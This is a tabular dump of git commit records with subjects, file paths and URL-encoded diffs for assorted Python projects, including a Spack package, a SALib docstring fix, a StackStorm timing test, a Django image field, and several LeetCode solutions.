commit
stringlengths
40
40
subject
stringlengths
1
3.25k
old_file
stringlengths
4
311
new_file
stringlengths
4
311
old_contents
stringlengths
0
26.3k
lang
stringclasses
3 values
proba
float64
0
1
diff
stringlengths
0
7.82k
eff5016653980f24c5c55dfb866dbe108f50dedf
Add the cbtf spack build package. cbtf is the base package for the component based tool framework and is used for building and connecting cbtf components, including distributed components via the MRNet transfer mechanism.
var/spack/packages/cbtf/package.py
var/spack/packages/cbtf/package.py
Python
0
@@ -0,0 +1,2719 @@ +################################################################################%0A# Copyright (c) 2015 Krell Institute. All Rights Reserved.%0A#%0A# This program is free software; you can redistribute it and/or modify it under%0A# the terms of the GNU General Public License as published by the Free Software%0A# Foundation; either version 2 of the License, or (at your option) any later%0A# version.%0A#%0A# This program is distributed in the hope that it will be useful, but WITHOUT%0A# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS%0A# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more%0A# details.%0A#%0A# You should have received a copy of the GNU General Public License along with%0A# this program; if not, write to the Free Software Foundation, Inc., 59 Temple%0A# Place, Suite 330, Boston, MA 02111-1307 USA%0A################################################################################%0A%0Afrom spack import *%0A%0Aclass Cbtf(Package):%0A %22%22%22CBTF project contains the base code for CBTF that supports creating components, %0A component networks and the support to connect these components and component %0A networks into sequential and distributed network tools.%22%22%22%0A homepage = %22http://sourceforge.net/p/cbtf/wiki/Home%22%0A%0A url = %22http://sourceforge.net/projects/cbtf/files/cbtf-1.5/cbtf-1.5.tar.gz/download%22%0A version('1.5', '75a97e0161d19b3a12305ed1ffb3d3e2')%0A%0A # Mirror access template example%0A #url = %22file:/opt/spack-mirror-2015-02-27/cbtf/cbtf-1.5.tar.gz%22%0A #version('1.5', '1ca88a8834759c4c74452cb97fe7b70a')%0A%0A # Use when the git repository is available%0A #version('1.5', branch='master', git='http://git.code.sf.net/p/cbtf/cbtf')%0A%0A depends_on(%22cmake%22)%0A depends_on(%[email protected]:%22)%0A depends_on(%[email protected]+krelloptions%22)%0A depends_on(%[email protected]:%22)%0A depends_on(%22libxml2%22)%0A%0A parallel = False%0A%0A def install(self, spec, prefix):%0A with working_dir('build', create=True):%0A%0A%0A # Boost_NO_SYSTEM_PATHS Set to TRUE to suppress searching %0A # in system paths (or other locations outside of BOOST_ROOT%0A # or BOOST_INCLUDEDIR). Useful when specifying BOOST_ROOT. %0A # Defaults to OFF.%0A%0A cmake('..',%0A '--debug-output',%0A '-DBoost_NO_SYSTEM_PATHS=TRUE',%0A '-DXERCESC_DIR=%25s' %25 spec%5B'xerces-c'%5D.prefix,%0A '-DBOOST_ROOT=%25s' %25 spec%5B'boost'%5D.prefix,%0A '-DMRNET_DIR=%25s' %25 spec%5B'mrnet'%5D.prefix,%0A '-DCMAKE_MODULE_PATH=%25s' %25 join_path(prefix.share,'KrellInstitute','cmake'),%0A *std_cmake_args)%0A%0A make(%22clean%22)%0A make()%0A make(%22install%22)%0A
8faaee841f613753515e31c2e5d269222fccf898
fix doc typo (default interference parameter)
SALib/analyze/rbd_fast.py
SALib/analyze/rbd_fast.py
#!/usr/bin/env python # coding=utf8 from __future__ import division from __future__ import print_function import numpy as np from scipy.signal import periodogram from . import common_args from ..util import read_param_file def analyze(problem, Y, X, M=10, print_to_console=False): """Performs the Random Balanced Design - Fourier Amplitude Sensitivity Test (RBD-FAST) on model outputs. Returns a dictionary with keys 'S1', where each entry is a list of size D (the number of parameters) containing the indices in the same order as the parameter file. Parameters ---------- problem : dict The problem definition Y : numpy.array A NumPy array containing the model outputs X : numpy.array A NumPy array containing the model inputs M : int The interference parameter, i.e., the number of harmonics to sum in the Fourier series decomposition (default 4) print_to_console : bool Print results directly to console (default False) References ---------- .. [1] S. Tarantola, D. Gatelli and T. Mara (2006) "Random Balance Designs for the Estimation of First Order Global Sensitivity Indices", Reliability Engineering and System Safety, 91:6, 717-727 .. [2] Elmar Plischke (2010) "An effective algorithm for computing global sensitivity indices (EASI) Reliability Engineering & System Safety", 95:4, 354-360. doi:10.1016/j.ress.2009.11.005 .. [3] Jean-Yves Tissot, Clémentine Prieur (2012) "Bias correction for the estimation of sensitivity indices based on random balance designs.", Reliability Engineering and System Safety, Elsevier, 107, 205-213. doi:10.1016/j.ress.2012.06.010 .. [4] Jeanne Goffart, Mickael Rabouille & Nathan Mendes (2015) "Uncertainty and sensitivity analysis applied to hygrothermal simulation of a brick building in a hot and humid climate", Journal of Building Performance Simulation. doi:10.1080/19401493.2015.1112430 Examples -------- >>> X = latin.sample(problem, 1000) >>> Y = Ishigami.evaluate(X) >>> Si = rbd_fast.analyze(problem, Y, X, print_to_console=False) """ D = problem['num_vars'] N = Y.size # Calculate and Output the First Order Value if print_to_console: print("Parameter First") Si = dict((k, [None] * D) for k in ['S1']) for i in range(D): S1 = compute_first_order(permute_outputs(Y, X[:, i]), M) S1 = unskew_S1(S1, M, N) Si['S1'][i] = S1 if print_to_console: print("%s %g" % (problem['names'][i].ljust(9), Si['S1'][i])) return Si def permute_outputs(Y, X): """ Permute the output according to one of the inputs (Elmar Plischke (2010) "An effective algorithm for computing global sensitivity indices (EASI) Reliability Engineering & System Safety", 95:4, 354-360. doi:10.1016/j.ress.2009.11.005) """ permutation_index = np.argsort(X) permutation_index = np.concatenate([permutation_index[::2], permutation_index[1::2][::-1]]) return Y[permutation_index] def compute_first_order(permuted_outputs, M): _, Pxx = periodogram(permuted_outputs) V = np.sum(Pxx[1:]) D1 = np.sum(Pxx[1: M + 1]) return D1 / V def unskew_S1(S1, M, N): """ Unskew the sensivity indice (Jean-Yves Tissot, Clémentine Prieur (2012) "Bias correction for the estimation of sensitivity indices based on random balance designs.", Reliability Engineering and System Safety, Elsevier, 107, 205-213. doi:10.1016/j.ress.2012.06.010) """ lamb = (2 * M) / N return S1 - lamb / (1 - lamb) * (1 - S1) if __name__ == "__main__": parser = common_args.create() parser.add_argument('-X', '--model-input-file', type=str, required=True, help='Model input file') args = parser.parse_args() problem = read_param_file(args.paramfile) Y = np.loadtxt(args.model_output_file, delimiter=args.delimiter, usecols=(args.column,)) X = np.loadtxt(args.model_input_file, delimiter=args.delimiter) analyze(problem, Y, X, print_to_console=True)
Python
0
@@ -961,17 +961,18 @@ default -4 +10 )%0D%0A p
fc21bb14600f79a3d9970272fb7edd4eba548262
Add test for python runner action wrapper process script performance.
st2actions/tests/integration/test_python_action_process_wrapper.py
st2actions/tests/integration/test_python_action_process_wrapper.py
Python
0
@@ -0,0 +1,2639 @@ +# Licensed to the StackStorm, Inc ('StackStorm') under one or more%0A# contributor license agreements. See the NOTICE file distributed with%0A# this work for additional information regarding copyright ownership.%0A# The ASF licenses this file to You under the Apache License, Version 2.0%0A# (the %22License%22); you may not use this file except in compliance with%0A# the License. You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22%0ATest case which tests that Python runner action wrapper finishes in %3C= 200ms. If the process takes%0Amore time to finish, this means it probably directly or in-directly imports some modules which have%0Aside affects and are very slow to import.%0A%0AExamples of such modules include:%0A* jsonschema%0A* pecan%0A* jinja2%0A* kombu%0A* mongoengine%0A%0AIf the tests fail, look at the recent changes and analyze the import graph using the following%0Acommand: %22profimp %22from st2common.runners import python_action_wrapper%22 --html %3E report.html%22%0A%22%22%22%0A%0Aimport os%0A%0Aimport unittest2%0A%0Afrom st2common.util.shell import run_command%0A%0A# Maximum limit for the process wrapper script execution time (in seconds)%0AWRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT = 0.35%0A%0AASSERTION_ERROR_MESSAGE = (%22%22%22%0APython wrapper process script took more than %25s seconds to execute (%25s). This most likely means%0Athat a direct or in-direct import of a module which takes a long time to load has been added (e.g.%0Ajsonschema, pecan, kombu, etc).%0A%0APlease review recently changed and added code for potential slow import issues and refactor /%0Are-organize code if possible.%0A%22%22%22.strip())%0A%0ABASE_DIR = os.path.dirname(os.path.abspath(__file__))%0AWRAPPER_SCRIPT_PATH = os.path.join(BASE_DIR, '../../st2common/runners/python_action_wrapper.py')%0A%0A%0Aclass PythonRunnerActionWrapperProcess(unittest2.TestCase):%0A def test_process_wrapper_exits_in_reasonable_timeframe(self):%0A _, _, stderr = run_command('/usr/bin/time -f %22%25%25e%22 python %25s' %25 (WRAPPER_SCRIPT_PATH),%0A shell=True)%0A%0A stderr = stderr.strip().split('%5Cn')%5B-1%5D%0A%0A run_time_seconds = float(stderr)%0A assertion_msg = ASSERTION_ERROR_MESSAGE %25 (WRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT,%0A run_time_seconds)%0A self.assertTrue(run_time_seconds %3C= WRAPPER_PROCESS_RUN_TIME_UPPER_LIMIT, assertion_msg)%0A
c6df42ca99c8f633c2f1efeb9af26ad4b88c4d75
Create 04.py
02/hw/04.py
02/hw/04.py
Python
0
@@ -0,0 +1,801 @@ +# Define a procedure, find_last, that takes as input%0A# two strings, a search string and a target string,%0A# and returns the last position in the search string%0A# where the target string appears, or -1 if there%0A# are no occurences.%0A#%0A# Example: find_last('aaaa', 'a') returns 3%0A%0A# Make sure your procedure has a return statement.%0A%0Adef find_last(search, target):%0A ii = 0%0A ans = -1%0A while ii %3E= 0:%0A ii = search.find(target, ii)%0A if ii != -1:%0A ans = ii%0A ii = ii + 1 %0A return ans%0A%0A#print find_last('aaaa', 'a')%0A#%3E%3E%3E 3%0A%0A#print find_last('aaaaa', 'aa')%0A#%3E%3E%3E 3%0A%0A#print find_last('aaaa', 'b')%0A#%3E%3E%3E -1%0A%0A#print find_last(%22111111111%22, %221%22)%0A#%3E%3E%3E 8%0A%0A#print find_last(%22222222222%22, %22%22)%0A#%3E%3E%3E 9%0A%0A#print find_last(%22%22, %223%22)%0A#%3E%3E%3E -1%0A%0A#print find_last(%22%22, %22%22)%0A#%3E%3E%3E 0%0A%0A%0A%0A%0A
ba0093c8b6801bdbded870ea5cc27eeec05abb58
create db script
web/create_db.py
web/create_db.py
Python
0.000001
@@ -0,0 +1,807 @@ +__author__ = 'David Mitchell'%0A#This script creates an example/test db.%0A%0Afrom app import db%0Afrom app import MenuCategory, MenuItem%0A%0Adb.drop_all()%0Adb.create_all()%0A%0Aappetizer_category = MenuCategory(name='Appetizers')%0Aentree_category = MenuCategory(name='Entrees')%0Adesert_category = MenuCategory(name='Deserts')%0Abacon_item = MenuItem(name='Bacon', description='Delicious bacon', category=appetizer_category)%0Abaconz_item = MenuItem(name='Baconz', description='Bacon with Bacon on top, fried in a bacon crust', category=entree_category)%0AbaconIceCream_item = MenuItem(name='Bacon Ice Cream', description='Bacon Ice Cream topped with bacon bits', category=desert_category)%0A%0Adb.session.add_all(%5Bappetizer_category, entree_category, desert_category, bacon_item, baconz_item, baconIceCream_item%5D)%0Adb.session.commit()%0A
955a2a7e467cdcf83a19525e421feb9a5eaca7e3
Add huxley/js.py for javascript
huxley/js.py
huxley/js.py
Python
0
@@ -0,0 +1,1252 @@ +# Copyright (c) 2013 Facebook%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or impliedriver.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22%0AJavaScript to be executed in the testing user agent.%0A%22%22%22%0A%0A%0AgetHuxleyEvents = %22%22%22%0A(function() %7B%0A var events = %5B%5D;%0A%0A window.addEventListener(%0A 'click',%0A function (e) %7B events.push(%5BDate.now(), 'click', %5Be.clientX, e.clientY%5D%5D); %7D,%0A true%0A );%0A window.addEventListener(%0A 'keyup',%0A function (e) %7B events.push(%5BDate.now(), 'keyup', String.fromCharCode(e.keyCode)%5D); %7D,%0A true%0A );%0A window.addEventListener(%0A 'scroll',%0A function(e) %7B events.push(%5BDate.now(), 'scroll', %5Bthis.pageXOffset, this.pageYOffset%5D%5D); %7D,%0A true%0A );%0A%0A window._getHuxleyEvents = function() %7B return events %7D;%0A%7D)();%0A%22%22%22
79710bb5b77b8cfa95d92f7f39ac44fc0c605022
Create featureCC.py
featureCC.py
featureCC.py
Python
0
@@ -0,0 +1,2285 @@ +### *- Program: FeatureCC%0A### *- Objective: To determine the total number of point, line, and polygon shapefiles%0A### in a directory%0A### *- Input: Provided by the user (workspace)%0A### *- Output: Display total files for point, line, and polygon shapefiles to the user%0A%0A# - START PROGRAM -%0A%0A# Import OS module to load appropriate paths depending on which system is being used%0Aimport os%0A%0A# Import ArcPy module to use built-in functions to achieve the program objective%0Aimport arcpy%0A# From ArcPy, import the environment/workspace%0Afrom arcpy import env%0A%0A# Ask the user to input a file path to set as a workspace%0Aenv.workspace = raw_input(%22%5CnPlease enter your file path: %22)%0A# Assign the workspace to a new variable%0AfilePath = env.workspace%0A%0Ax = 0%0Awhile x %3C 1: # Set up a file validation system %0A if os.path.exists(filePath): # If file path, exists: continue. Otherwise..%0A x = 1 # ..go to Line 45%0A %0A point = arcpy.ListFeatureClasses(%22*%22, %22Point%22) # List point feature classes%0A line = arcpy.ListFeatureClasses(%22*%22, %22Line%22) # List line feature classes%0A poly = arcpy.ListFeatureClasses(%22*%22, %22Polygon%22) # List polygon feature classes%0A %0A pointCount = len(point) # Count the number of point feature classes%0A lineCount = len(line) # Count the number of line feature classes%0A polyCount = len(poly) # Count the number of polygon feature classes%0A %0A print(%22%5CnPOINTS:%22), pointCount, (%22files%22) # Print total for point feature classes %0A print(%22LINES:%22), lineCount, (%22files%22) # Print total for line feature classes%0A print(%22POLYGONS:%22), polyCount, (%22files%5Cn%22) # Print total for polygon feature classes%0A %0A else:%0A raw_input(%22%5Cn!ERROR! - File path does not exist.%22 # If file path does not exist..%0A %22%5CnPress Enter to continue. %22) # ..display an error message..%0A env.workspace = raw_input(%22%5CnPlease enter your file path: %22) # ..and ask user to..%0A filePath = env.workspace # ..enter it again%0A%0A# Import time module and exit the program in 10 seconds%0Aimport time%0Atime.sleep(10)%0A%0A# - END PROGRAM -%0A%0A# I'm gonna make him an offer he can't refuse%0A# - Don Vito Corleone (The Godfather)%0A
61fa5c26b9b2eff24e88313671c7aa673e24bb0f
Create pythagoras.py
pythagoras.py
pythagoras.py
Python
0.000003
@@ -0,0 +1,198 @@ +#!/bin/python%0Afrom math import sqrt %0A%0Aprint %22a%5E2 + b%5E2 = c%5E2%22%0A%0Aleg1 = raw_input(%22Leg1 (a): %22)%0Aleg2 = raw_input(%22Leg2 (b): %22)%0A%0Ahypotenuse = sqrt((int(leg1) ** 2) + (int(leg2) ** 2))%0Aprint hypotenuse%0A
c1bed8533d479112df6ae4aea0bb31e4419ae4f8
change location of jianfan lib in data repo
setup/setupdev.py
setup/setupdev.py
#!/usr/bin/env python # -*- coding:utf-8 -*- import os import shutil """ $PALI_DIR is the dir of git clone https://github.com/siongui/pali.git Manual setup (for reference): 1. setup TongWen (deprecated): ```bash cd $PALI_DIR mkdir -p common/app/scripts/ext cd common/app/scripts/ext/ wget http://tongwen.openfoundry.org/src/web/tongwen_core.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_s2t.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_t2s.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_ps2t.js wget http://tongwen.openfoundry.org/src/web/tongwen_table_pt2s.js ``` 2. setup jianfan (deprecated): ```bash wget https://python-jianfan.googlecode.com/files/jianfan-0.0.2.zip unzip jianfan-0.0.2.zip mv jianfan-0.0.2/jianfan $PALI_DIR/common/pylib/ rm -rf jianfan-0.0.2 ``` 3. create symbolic links: ```bash cd $PALI_DIR/tipitaka ln -s ../common/ common cd $PALI_DIR/tipitaka/pylib ln -s ../../../data/pali/common/translation/ translation ln -s ../../../data/pali/common/romn/ romn cd $PALI_DIR/dictionary ln -s ../common/ common cd $PALI_DIR/common/pylib ln -s ../../../data/pali/common/gae/libs/jianfan/ jianfan ``` """ def ln(source, link_name): if os.path.islink(link_name): os.unlink(link_name) os.symlink(source, link_name) def setupSymlinks(): # enter tipitaka dir os.chdir(os.path.join(os.path.dirname(__file__), '../tipitaka')) ln('../common/', 'common') os.chdir('pylib') ln('../../../data/pali/common/translation/', 'translation') ln('../../../data/pali/common/romn/', 'romn') # enter dictionary dir os.chdir('../../dictionary') ln('../common/', 'common') # enter common dir os.chdir('../common/pylib') ln('../../../data/pali/common/gae/libs/jianfan/', 'jianfan') if __name__ == '__main__': tipitakaLatnCssPath = os.path.join(os.path.dirname(__file__), '../../data/pali/common/romn/cscd/tipitaka-latn.css') dstPath = os.path.join(os.path.dirname(__file__), '../tipitaka/app/css/tipitaka-latn.css') shutil.copyfile(tipitakaLatnCssPath, dstPath) setupSymlinks()
Python
0
@@ -1160,35 +1160,20 @@ ./data/p -ali/common/gae/ +y lib -s /jianfan @@ -1741,27 +1741,12 @@ ta/p -ali/common/gae/ +y lib -s /jia
7b09ba64c0327ecea04cc95057ffa7d5c8d939c8
Add test for setopt to demonstrate that edit_config retains non-ASCII characters.
setuptools/tests/test_setopt.py
setuptools/tests/test_setopt.py
Python
0
@@ -0,0 +1,1072 @@ +# coding: utf-8%0A%0Afrom __future__ import unicode_literals%0A%0Aimport io%0A%0Aimport six%0A%0Afrom setuptools.command import setopt%0Afrom setuptools.extern.six.moves import configparser%0A%0A%0Aclass TestEdit:%0A @staticmethod%0A def parse_config(filename):%0A parser = configparser.ConfigParser()%0A with io.open(filename, encoding='utf-8') as reader:%0A (parser.read_file if six.PY3 else parser.readfp)(reader)%0A return parser%0A%0A @staticmethod%0A def write_text(file, content):%0A with io.open(file, 'wb') as strm:%0A strm.write(content.encode('utf-8'))%0A%0A def test_utf8_encoding_retained(self, tmpdir):%0A %22%22%22%0A When editing a file, non-ASCII characters encoded in%0A UTF-8 should be retained.%0A %22%22%22%0A config = tmpdir.join('setup.cfg')%0A self.write_text(config, '%5Bnames%5D%5Cnjaraco=%D0%B9%D0%B0%D1%80%D0%B0%D1%86%D0%BE')%0A setopt.edit_config(str(config), dict(names=dict(other='yes')))%0A parser = self.parse_config(str(config))%0A assert parser%5B'names'%5D%5B'jaraco'%5D == '%D0%B9%D0%B0%D1%80%D0%B0%D1%86%D0%BE'%0A assert parser%5B'names'%5D%5B'other'%5D == 'yes'%0A
cbf0d257bcbaeddeb9390047f575038b5d842dc8
update version
paginator_plus/__init__.py
paginator_plus/__init__.py
Python
0
@@ -0,0 +1,48 @@ +# -*- coding: utf-8 -*-%0A%0A%0A__version__ = '0.0.1'%0A
dc5e87f4a7bb1399951423c3a4236c58ab723665
change AjaxImageField to behave like standard django FileField
ajaximage/fields.py
ajaximage/fields.py
#-*- coding: utf-8 -*- from django.db.models import Field from django.forms import widgets from ajaximage.widgets import AjaxImageEditor from django.conf import settings class AjaxImageField(Field): def __init__(self, *args, **kwargs): upload_to = kwargs.pop('upload_to', '') max_height = kwargs.pop('max_height', 0) max_width = kwargs.pop('max_width', 0) crop = kwargs.pop('crop', False) crop = 1 if crop is True else 0 if(crop is 1 and (max_height is 0 or max_width is 0)): raise Exception('Both max_width and max_height are needed if cropping') self.widget = AjaxImageEditor(upload_to=upload_to, max_width=max_width, max_height=max_height, crop=crop) super(AjaxImageField, self).__init__(*args, **kwargs) def get_internal_type(self): return "TextField" def formfield(self, **kwargs): defaults = {'widget': self.widget} defaults.update(kwargs) return super(AjaxImageField, self).formfield(**defaults) if 'south' in settings.INSTALLED_APPS: from south.modelsinspector import add_introspection_rules add_introspection_rules([], ["^ajaximage\.fields\.AjaxImageField"])
Python
0
@@ -32,173 +32,350 @@ ngo. -db.models import Field%0Afrom django.forms import widgets +core.files.storage import default_storage%0Afrom django.db.models.fields.files import FileDescriptor, FieldFile %0Afrom -ajaximage.widgets import AjaxImageEditor%0Afrom django.conf import settings%0A%0A%0Aclass AjaxImageField(Field): +django.db.models import Field%0Afrom django.conf import settings%0Afrom .widgets import AjaxImageEditor%0A%0A%0Aclass AjaxImageField(Field):%0A%0A storage = default_storage%0A attr_class = FieldFile%0A descriptor_class = FileDescriptor%0A %0A @@ -637,24 +637,16 @@ else 0%0A - %0A @@ -648,17 +648,17 @@ if -( + crop is @@ -698,17 +698,16 @@ th is 0) -) :%0A @@ -823,16 +823,29 @@ eEditor( +%0A upload_t @@ -873,54 +873,62 @@ - max_width=max_width +max_width=max_width,%0A max_height=max_height ,%0A @@ -933,32 +933,42 @@ +crop=crop%0A @@ -951,32 +951,34 @@ rop%0A +)%0A m @@ -969,192 +969,549 @@ - max_height=max_height,%0A crop=crop)%0A %0A super(AjaxImageField, self).__init__(*args, **kwargs +super(AjaxImageField, self).__init__(*args, **kwargs)%0A%0A def contribute_to_class(self, cls, name, virtual_only=False):%0A super(AjaxImageField, self).contribute_to_class(cls, name, virtual_only)%0A setattr(cls, self.name, self.descriptor_class(self))%0A%0A def get_prep_value(self, value):%0A %22%22%22Returns field's value prepared for saving into a database.%22%22%22%0A # Need to convert File objects provided via a form to unicode for database insertion%0A if value is None:%0A return None%0A return str(value )%0A%0A
2a963c4d13035b6f8e301a7f0240b28e0e0764d3
Create WordLadder_001.py
leetcode/127-Word-Ladder/WordLadder_001.py
leetcode/127-Word-Ladder/WordLadder_001.py
Python
0
@@ -0,0 +1,910 @@ +class Solution(object):%0A def ladderLength(self, beginWord, endWord, wordList):%0A %22%22%22%0A :type beginWord: str%0A :type endWord: str%0A :type wordList: Set%5Bstr%5D%0A :rtype: int%0A %22%22%22%0A if beginWord == endWord:%0A return 1%0A %0A cnt = 1%0A q = %5BbeginWord%5D%0A %0A while q:%0A nq = %5B%5D%0A for word in q:%0A for i in range(len(beginWord)):%0A for j in 'abcdefghijklmnopqrstuvwxyz':%0A if j != word%5Bi%5D:%0A nword = word%5B:i%5D + j + word%5Bi + 1:%5D%0A if nword == endWord:%0A return cnt + 1%0A if nword in wordList:%0A nq.append(nword)%0A wordList.remove(nword)%0A cnt += 1%0A q = nq%0A return 0%0A
c657d92f1f8dc3cd4ff9995dc0d2857ce8f6fdd4
Create CountingBits.py
leetcode/338-Counting-Bits/CountingBits.py
leetcode/338-Counting-Bits/CountingBits.py
Python
0.000001
@@ -0,0 +1,330 @@ +class Solution(object):%0A def countBits(self, num):%0A %22%22%22%0A :type num: int%0A :rtype: List%5Bint%5D%0A %22%22%22%0A seed = 1%0A res = %5B0%5D%0A %0A while num %3E 0:%0A res += %5Bres%5Bi%5D + 1 for i in xrange(min(num, seed))%5D%0A num -= seed%0A seed = seed %3C%3C 1%0A return res%0A
0cd5ed79f019db91261c0d858b61796021ec3f80
Add syntax highlighting tests for PEP 570
test/highlight/parameters.py
test/highlight/parameters.py
Python
0
@@ -0,0 +1,99 @@ +def g(h, i, /, j, *, k=100, **kwarg):%0A # %5E operator%0A # %5E operator%0A pass%0A
511c8049c0b6bd12fd30550c2ffa2ec86341ef4f
version 0.1 added to the repo
fetch_remote_data/__init__.py
fetch_remote_data/__init__.py
Python
0
@@ -0,0 +1,18 @@ +__version__=%220.1%22%0A
bf6c8ce59ec841b19dab3a02a9065864035d4d82
Add a new helper to convert stackalytics default_data.json
bin/helpers/openstack/stackalytics.py
bin/helpers/openstack/stackalytics.py
Python
0.00006
@@ -0,0 +1,2407 @@ +import sys%0Aimport json%0Aimport yaml%0Aimport datetime%0A%0A# Read default_data.json from stackalytics/etc/ and convert for%0A# repoXplorer.%0A%0Aif __name__ == %22__main__%22:%0A ident = %7B'identities': %7B%7D,%0A 'groups': %7B%7D%7D%0A data = json.loads(file(sys.argv%5B1%5D).read())%0A users = data%5B'users'%5D%0A groups = data%5B'companies'%5D%0A i = ident%5B'identities'%5D%0A g = ident%5B'groups'%5D%0A gstore = %7B%7D%0A for group in groups:%0A gstore%5Bgroup%5B'company_name'%5D%5D = group%5B'domains'%5D%0A for user in users:%0A try:%0A i%5Buser%5B'launchpad_id'%5D%5D = %7B%7D%0A iu = i%5Buser%5B'launchpad_id'%5D%5D%0A except:%0A try:%0A i%5Buser%5B'github_id'%5D%5D = %7B%7D%0A iu = i%5Buser%5B'github_id'%5D%5D%0A except:%0A continue%0A sys.stdout.write('.')%0A iu%5B'name'%5D = user%5B'user_name'%5D%0A iu%5B'default-email'%5D = user%5B'emails'%5D%5B0%5D%0A iu%5B'emails'%5D = %7B%7D%0A for email in user%5B'emails'%5D:%0A iu%5B'emails'%5D.setdefault(email, %7B%7D)%0A histo = %5B%5D%0A for c in user%5B'companies'%5D:%0A iu%5B'emails'%5D%5Bemail%5D.setdefault('groups', %7B%7D)%0A iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bc%5B'company_name'%5D%5D = %7B%7D%0A # cd = iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bc%5B'company_name'%5D%5D%0A g.setdefault(%0A c%5B'company_name'%5D, %7B%0A 'description': '',%0A 'emails': %7B%7D,%0A 'domains': gstore.get(c%5B'company_name'%5D, %5B%5D)%0A %7D)%0A if c%5B'end_date'%5D is not None:%0A end_date_raw = datetime.datetime.strptime(%0A c%5B'end_date'%5D, '%25Y-%25b-%25d')%0A histo.append(%5BNone, end_date_raw, c%5B'company_name'%5D%5D)%0A else:%0A histo.append(%5BNone, None, c%5B'company_name'%5D%5D)%0A histo.sort(key=lambda tup: tup%5B1%5D or datetime.datetime.today())%0A for z, h in enumerate(histo):%0A if z == 0:%0A pass%0A h%5B0%5D = histo%5Bz-1%5D%5B1%5D%0A cd = iu%5B'emails'%5D%5Bemail%5D%5B'groups'%5D%5Bh%5B2%5D%5D%0A if h%5B0%5D:%0A cd%5B'begin-date'%5D = h%5B0%5D.strftime('%25Y-%25m-%25d')%0A if h%5B1%5D:%0A cd%5B'end-date'%5D = h%5B1%5D.strftime('%25Y-%25m-%25d')%0A%0A path = 'test.yaml'%0A with open(path, 'w') as fd:%0A fd.write(yaml.safe_dump(ident,%0A default_flow_style=False))%0A
367a1ff9f0ca3daae3ee804b5484e3863bb72307
Add initial proposal tests
tests/views/test_proposal.py
tests/views/test_proposal.py
Python
0
@@ -0,0 +1,2671 @@ +#!/usr/bin/env python2.5%0A#%0A# Copyright 2011 the Melange authors.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0A%22%22%22Tests for proposal view.%0A%22%22%22%0A%0A__authors__ = %5B%0A '%22Sverre Rabbelier%22 %[email protected]%3E',%0A %5D%0A%0A%0Aimport httplib%0A%0Afrom tests.profile_utils import GSoCProfileHelper%0Afrom tests.test_utils import DjangoTestCase%0Afrom tests.timeline_utils import TimelineHelper%0A%0A# TODO: perhaps we should move this out?%0Afrom soc.modules.gsoc.models.proposal import GSoCProposal%0Afrom soc.modules.seeder.logic.seeder import logic as seeder_logic%0A%0A%0Aclass ProposalTest(DjangoTestCase):%0A %22%22%22Tests proposal page.%0A %22%22%22%0A%0A def setUp(self):%0A from soc.modules.gsoc.models.program import GSoCProgram%0A from soc.modules.gsoc.models.organization import GSoCOrganization%0A properties = %7B'status': 'visible', 'apps_tasks_limit': 20%7D%0A self.gsoc = seeder_logic.seed(GSoCProgram, properties=properties)%0A properties = %7B'scope': self.gsoc, 'status': 'active'%7D%0A self.org = seeder_logic.seed(GSoCOrganization, properties=properties)%0A self.timeline = TimelineHelper(self.gsoc.timeline)%0A self.data = GSoCProfileHelper(self.gsoc)%0A%0A def assertProposalTemplatesUsed(self, response):%0A %22%22%22Asserts that all the templates from the dashboard were used.%0A %22%22%22%0A self.assertGSoCTemplatesUsed(response)%0A self.assertTemplateUsed(response, 'v2/modules/gsoc/proposal/base.html')%0A self.assertTemplateUsed(response, 'v2/modules/gsoc/_form.html')%0A%0A def testSubmitProposal(self):%0A self.data.createStudent()%0A self.timeline.studentSignup()%0A url = '/gsoc/proposal/submit/' + self.org.key().name()%0A response = self.client.get(url)%0A self.assertProposalTemplatesUsed(response)%0A%0A # test POST%0A override = %7B'program': self.gsoc, 'score': 0, 'mentor': None, 'org': self.org, 'status': 'new'%7D%0A properties = seeder_logic.seed_properties(GSoCProposal, properties=override)%0A postdata = properties.copy()%0A postdata%5B'xsrf_token'%5D = self.getXsrfToken(url)%0A response = self.client.post(url, postdata)%0A self.assertResponseRedirect(response)%0A%0A # TODO(SRabbelier): verify%0A proposal = GSoCProposal.all().get()%0A self.assertPropertiesEqual(properties, proposal)%0A
ee4ab0cf3ef08459e1a8ad1cdae370870ba28805
Create lc1755.py
LeetCode/lc1755.py
LeetCode/lc1755.py
Python
0.000001
